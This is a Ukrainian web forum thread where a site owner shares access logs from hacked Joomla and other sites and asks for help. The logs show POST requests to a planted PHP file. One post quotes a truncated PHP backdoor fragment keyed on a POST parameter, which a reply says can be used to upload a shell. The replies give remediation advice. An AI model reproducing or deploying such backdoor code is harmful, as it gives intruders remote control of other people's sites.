71.20.159.71 - - [09/Jan/2014:13:13:13 +0200] 302 "POST /wp-login.php HTTP/1.1" 160 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" "-"

71.20.159.71 - - [09/Jan/2014:13:13:13 +0200] "GET /wp-login.php HTTP/1.0" 404 663 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

71.20.159.71 - - [09/Jan/2014:13:13:13 +0200] 404 "GET /wp-login.php HTTP/1.1" 494 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" "-"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] "GET / HTTP/1.0" 200 2563 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] 200 "GET / HTTP/1.1" 2339 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] "GET /js/jquery.js HTTP/1.0" 404 423 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] 404 "GET /js/jquery.js HTTP/1.1" 197 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] "GET /js/interface.js HTTP/1.0" 404 427 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] 404 "GET /js/interface.js HTTP/1.1" 201 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] 200 "GET /helpline.css HTTP/1.1" 867 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] 200 "GET /style.css HTTP/1.1" 1336 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] 200 "GET /images/home.jpg HTTP/1.1" 1988 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] 200 "GET /images/about.png HTTP/1.1" 8768 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] 200 "GET /images/kontaktu.png HTTP/1.1" 9810 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] "GET /index.php?image=044fe20abf6f705741df224ddea0f9bf HTTP/1.0" 200 303 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] 200 "GET /index.php?image=044fe20abf6f705741df224ddea0f9bf HTTP/1.1" 81 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] 200 "GET /images/plashka.jpg HTTP/1.1" 3980 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] "GET /index.php?image=d731a49aae281b69bcd70f59fbcc2153 HTTP/1.0" 200 302 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] 200 "GET /index.php?image=d731a49aae281b69bcd70f59fbcc2153 HTTP/1.1" 80 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:49 +0200] "GET /index.php?image=50d05018072155224277f057e1931b04 HTTP/1.0" 200 302 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:21:49 +0200] 200 "GET /index.php?image=50d05018072155224277f057e1931b04 HTTP/1.1" 80 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:49 +0200] 200 "GET /images/logo.jpg HTTP/1.1" 41614 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:48 +0200] "GET /index.php?image=7f5f6cd32fc7fcd2945bc9c6cbe1a87e HTTP/1.0" 200 304 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:21:49 +0200] 200 "GET /index.php?image=7f5f6cd32fc7fcd2945bc9c6cbe1a87e HTTP/1.1" 82 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:21:49 +0200] "GET /favicon.ico HTTP/1.0" 404 423 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:21:49 +0200] 404 "GET /favicon.ico HTTP/1.1" 197 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:29:55 +0200] "GET /public_html/ HTTP/1.0" 404 426 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:29:55 +0200] 404 "GET /public_html/ HTTP/1.1" 200 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:29:56 +0200] "GET / HTTP/1.0" 200 3025 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:29:56 +0200] 200 "GET / HTTP/1.1" 2801 "-" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

65.52.241.141 - - [09/Jan/2014:13:36:08 +0200] "GET / HTTP/1.0" 200 3025 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)"

65.52.241.141 - - [09/Jan/2014:13:36:08 +0200] 200 "GET / HTTP/1.1" 2801 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" "-"

46.217.0.131 - - [09/Jan/2014:13:49:18 +0200] "GET / HTTP/1.0" 200 2568 "https://www.facebook.com/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:49:18 +0200] 200 "GET / HTTP/1.1" 2344 "https://www.facebook.com/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:49:18 +0200] "GET /js/jquery.js HTTP/1.0" 404 423 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:49:18 +0200] 404 "GET /js/jquery.js HTTP/1.1" 197 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:49:18 +0200] 404 "GET /js/interface.js HTTP/1.1" 201 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:49:18 +0200] "GET /js/interface.js HTTP/1.0" 404 427 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:49:18 +0200] "GET /index.php?image=7f5f6cd32fc7fcd2945bc9c6cbe1a87e HTTP/1.0" 200 304 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:49:19 +0200] 200 "GET /index.php?image=7f5f6cd32fc7fcd2945bc9c6cbe1a87e HTTP/1.1" 82 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:49:19 +0200] "GET /index.php?image=4d1d0cfb47594ee5f36c39f657441f93 HTTP/1.0" 200 304 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:49:19 +0200] "GET /index.php?image=50d05018072155224277f057e1931b04 HTTP/1.0" 200 302 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:49:19 +0200] 200 "GET /index.php?image=50d05018072155224277f057e1931b04 HTTP/1.1" 80 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:49:19 +0200] 200 "GET /index.php?image=4d1d0cfb47594ee5f36c39f657441f93 HTTP/1.1" 82 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:49:19 +0200] "GET /index.php?image=e8aafaf18812458f729550d9af59bc37 HTTP/1.0" 200 303 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:49:19 +0200] 200 "GET /index.php?image=e8aafaf18812458f729550d9af59bc37 HTTP/1.1" 81 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

31.13.97.117 - - [09/Jan/2014:13:49:20 +0200] "GET / HTTP/1.0" 200 2535 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"

31.13.97.117 - - [09/Jan/2014:13:49:20 +0200] 200 "GET / HTTP/1.1" 2311 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

31.13.97.117 - - [09/Jan/2014:13:49:21 +0200] 206 "GET /images/about.png HTTP/1.1" 8768 "http://helpline.in.ua/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

31.13.97.117 - - [09/Jan/2014:13:49:21 +0200] "GET /index.php?image=6198a7465b05d318a007aaa5a0314f1d HTTP/1.0" 200 300 "http://helpline.in.ua/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"

31.13.97.117 - - [09/Jan/2014:13:49:21 +0200] 200 "GET /index.php?image=6198a7465b05d318a007aaa5a0314f1d HTTP/1.1" 78 "http://helpline.in.ua/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

31.13.97.114 - - [09/Jan/2014:13:49:21 +0200] 206 "GET /images/logo.jpg HTTP/1.1" 9000 "http://helpline.in.ua/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

31.13.97.114 - - [09/Jan/2014:13:49:21 +0200] "GET /index.php?image=8ecc79eea1a698fc0941104c91dbc7d0 HTTP/1.0" 200 301 "http://helpline.in.ua/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"

31.13.97.114 - - [09/Jan/2014:13:49:21 +0200] 200 "GET /index.php?image=8ecc79eea1a698fc0941104c91dbc7d0 HTTP/1.1" 79 "http://helpline.in.ua/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

31.13.97.114 - - [09/Jan/2014:13:49:21 +0200] 206 "GET /images/kontaktu.png HTTP/1.1" 9000 "http://helpline.in.ua/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

31.13.97.116 - - [09/Jan/2014:13:49:21 +0200] 206 "GET /images/kontaktu.png HTTP/1.1" 9810 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

31.13.97.112 - - [09/Jan/2014:13:49:21 +0200] 206 "GET /images/plashka.jpg HTTP/1.1" 3980 "http://helpline.in.ua/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

31.13.97.115 - - [09/Jan/2014:13:49:22 +0200] 206 "GET /images/home.jpg HTTP/1.1" 1988 "http://helpline.in.ua/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

31.13.97.113 - - [09/Jan/2014:13:49:22 +0200] "GET /index.php?image=028b9acf80ffffa5db3c05d8e4c4490c HTTP/1.0" 200 303 "http://helpline.in.ua/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"

31.13.97.113 - - [09/Jan/2014:13:49:22 +0200] 200 "GET /index.php?image=028b9acf80ffffa5db3c05d8e4c4490c HTTP/1.1" 81 "http://helpline.in.ua/" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

173.252.102.119 - - [09/Jan/2014:13:49:22 +0200] 206 "GET /images/home.jpg HTTP/1.1" 1988 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

173.252.102.115 - - [09/Jan/2014:13:49:23 +0200] 206 "GET /images/kontaktu.png HTTP/1.1" 9810 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

173.252.102.113 - - [09/Jan/2014:13:49:23 +0200] "GET /index.php?image=028b9acf80ffffa5db3c05d8e4c4490c HTTP/1.0" 200 303 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"

173.252.102.113 - - [09/Jan/2014:13:49:23 +0200] 200 "GET /index.php?image=028b9acf80ffffa5db3c05d8e4c4490c HTTP/1.1" 81 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

173.252.102.118 - - [09/Jan/2014:13:49:24 +0200] 206 "GET /images/plashka.jpg HTTP/1.1" 3980 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

173.252.102.113 - - [09/Jan/2014:13:49:24 +0200] 206 "GET /images/logo.jpg HTTP/1.1" 41614 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

173.252.102.116 - - [09/Jan/2014:13:49:24 +0200] "GET /index.php?image=8ecc79eea1a698fc0941104c91dbc7d0 HTTP/1.0" 200 301 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"

173.252.102.116 - - [09/Jan/2014:13:49:24 +0200] 200 "GET /index.php?image=8ecc79eea1a698fc0941104c91dbc7d0 HTTP/1.1" 79 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

173.252.102.116 - - [09/Jan/2014:13:49:24 +0200] "GET /index.php?image=6198a7465b05d318a007aaa5a0314f1d HTTP/1.0" 200 300 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"

173.252.102.116 - - [09/Jan/2014:13:49:24 +0200] 200 "GET /index.php?image=6198a7465b05d318a007aaa5a0314f1d HTTP/1.1" 78 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

173.252.102.117 - - [09/Jan/2014:13:49:26 +0200] 206 "GET /images/about.png HTTP/1.1" 8768 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)" "-"

46.217.0.131 - - [09/Jan/2014:13:56:42 +0200] "GET / HTTP/1.0" 200 2509 "https://www.facebook.com/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:56:42 +0200] 200 "GET / HTTP/1.1" 2285 "https://www.facebook.com/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:56:42 +0200] "GET /js/jquery.js HTTP/1.0" 404 423 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:56:42 +0200] 404 "GET /js/jquery.js HTTP/1.1" 197 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:56:42 +0200] "GET /js/interface.js HTTP/1.0" 404 427 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:56:42 +0200] 404 "GET /js/interface.js HTTP/1.1" 201 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:56:43 +0200] "GET /index.php?image=4d1d0cfb47594ee5f36c39f657441f93 HTTP/1.0" 200 304 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:56:43 +0200] 200 "GET /index.php?image=4d1d0cfb47594ee5f36c39f657441f93 HTTP/1.1" 82 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

46.217.0.131 - - [09/Jan/2014:13:56:43 +0200] "GET /index.php?image=50d05018072155224277f057e1931b04 HTTP/1.0" 200 302 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36"

46.217.0.131 - - [09/Jan/2014:13:56:43 +0200] 200 "GET /index.php?image=50d05018072155224277f057e1931b04 HTTP/1.1" 80 "http://helpline.in.ua/" "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36" "-"

54.196.37.84 - - [09/Jan/2014:14:25:36 +0200] "GET /robots.txt HTTP/1.0" 404 423 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/1.1; +http://flipboard.com/browserproxy)"

54.196.37.84 - - [09/Jan/2014:14:25:36 +0200] 404 "GET /robots.txt HTTP/1.1" 197 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/1.1; +http://flipboard.com/browserproxy)" "-"

54.196.37.84 - - [09/Jan/2014:14:25:37 +0200] "GET / HTTP/1.0" 200 2538 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/1.1; +http://flipboard.com/browserproxy)"

54.196.37.84 - - [09/Jan/2014:14:25:37 +0200] 200 "GET / HTTP/1.1" 2314 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/1.1; +http://flipboard.com/browserproxy)" "-"

54.221.103.77 - - [09/Jan/2014:14:25:38 +0200] "GET /robots.txt HTTP/1.0" 404 661 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/2.0; +http://flipboard.com/browserproxy)"

54.221.103.77 - - [09/Jan/2014:14:25:38 +0200] 404 "GET /robots.txt HTTP/1.1" 492 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/2.0; +http://flipboard.com/browserproxy)" "-"

54.234.252.185 - - [09/Jan/2014:14:25:38 +0200] 200 "GET /images/about.png HTTP/1.1" 8768 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)" "-"

54.211.62.240 - - [09/Jan/2014:14:25:38 +0200] 200 "GET /images/home.jpg HTTP/1.1" 1988 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)" "-"

54.224.124.32 - - [09/Jan/2014:14:25:38 +0200] 200 "GET /images/kontaktu.png HTTP/1.1" 9810 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)" "-"

54.204.87.16 - - [09/Jan/2014:14:25:38 +0200] 200 "GET /images/plashka.jpg HTTP/1.1" 3980 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)" "-"

54.196.22.133 - - [09/Jan/2014:14:25:39 +0200] 200 "GET /images/logo.jpg HTTP/1.1" 41614 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6 (FlipboardProxy/1.2; +http://flipboard.com/browserproxy)" "-"

Посилання на коментар
Поділитись на інші сайти

Цей сайт взламали цього дня?

Вроді проглянув - нічого не бачу.

Потрібен лог сайта який взламали саме того дня коли взламали.

P.S. Ще як варіант: якщо використовуєте FileZilla - не зберігайте паролів (!!!), і перевірте всі компи де є фтп доступ на віруси. Як видалите всі збережені сеанси вашого сайту - змініть паролі.

Посилання на коментар
Поділитись на інші сайти

Ось код з тих файлів, що вони позаливали на сайти. НЕ знаю, чи можна по цьому вичіслити їхні дії.


<!--FILE IS NULL OR EMPTY-->
<?php
$version = "1.5";
if(!empty($_POST["gjwqweodsa"]) and strlen($_POST["gjwqweodsa"]) > 0 and isset($_POST["gjwqweodsa"])){
$isevalfunctionavailable = false;
...........................................
}
$lim++;
}
return $res;
}
?>

в якiй папцi був цей файл.? I цiкаво як вiн туди попав. за допомогою його можна на сайт закинути шелл.

Посилання на коментар
Поділитись на інші сайти

Який саме сайт взаламали цього дня важко сказати, бо їх 18. Але індекси переписані у всіх.

Да, юзав файлзіллу, поміняв паролі.

Файл не знаю, як попав в папку але таких файлів було багато по сайтах. В основному у рокуписних.

Дописано: а на сайті антічата відключена можливість зареєструватись і листа їм тоже не можна написати.....

Посилання на коментар
Поділитись на інші сайти

От якщо поставиш на все крім картінок 644 - перевір чи все працює після того.

Після того - удали сеанси з файлзіли і заходь лише з введенням пароля (без зберігання). І, надіюсь, все буде ок.

Посилання на коментар
Поділитись на інші сайти

Сайти на джумлі, опенкарі і хтмл+ксс.

Якщо ще i сайт на хтмл+ксс зламали, то точно хтось мав (пiдiбрав) пароль до фтп або панелi управлiння сайтом

постав права 644 на index.php чи який там у вас файл покоцаний лишнiм php кодом.

Посилання на коментар
Поділитись на інші сайти

Да, вже хостеру відправив запит шоб скрізь права поміняв.

Напевно, хакнули джумлу, а з неї вже по всіх папках індекси попереписали. Не факт, звичайно...

Мужикі, а скільки взагалі така робота коштує? Отак шоб провірити сайти на вразливість, знайти причину взлому і залатати? Можна, навіть в приват написати пропозиції якшо є.

Посилання на коментар
Поділитись на інші сайти

aroma, да це джумла 99%, через адмінку запхали шел.

mod_confirmation і mod_administrator якщо їх зачепили то це точно адмінка.

а, і причина це клієнт FileZilla, так що роботи там у вас ойо-йоой...

Посилання на коментар
Поділитись на інші сайти

Да, вєрняк.

Зара відкрив сайт, який вроді як хакнули і точно, там в mod_confirmation і mod_administrator і ше в папках прописані ці злощасні коди....

Я так зрозумів, що простим видаленням це не поправиш?

шо робити?

Посилання на коментар
Поділитись на інші сайти

  • Адміністратори

Шукати ліві файли в каталогах адмінки, в аплоадс.

Подивитись в логах, з яких хостів залили ці файли, забанити їх перманентно на фаєрволі.

Аналізувати логи.

Посилання на коментар
Поділитись на інші сайти

Ось лог сьогоднішній сайта, який хакнули. Щось можна сказати по ньому?

Час взлому приблизно 13:30-13:40

Тому що якраз працював над сайтом і тут бац....

5.83.132.144 - - [09/Jan/2014:13:08:13 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:09:57 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:09:42 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:11:27 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:11:12 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

5.83.132.144 - - [09/Jan/2014:13:12:57 +0200] 499 "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.1" 0 "-" "-" "-"

5.83.132.144 - - [09/Jan/2014:13:12:42 +0200] "POST /plugins/system/languagefilter/sys09725827.php HTTP/1.0" 200 197 "-" "-"

71.20.159.71 - - [09/Jan/2014:13:13:22 +0200] 302 "POST /wp-login.php HTTP/1.1" 160 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" "-"

71.20.159.71 - - [09/Jan/2014:13:13:23 +0200] 302 "GET /wp-login.php HTTP/1.1" 160 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)" "-"

71.20.159.71 - - [09/Jan/2014:13:13:23 +0200] "GET /wp-login.php HTTP/1.0" 404 640 "-" "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"

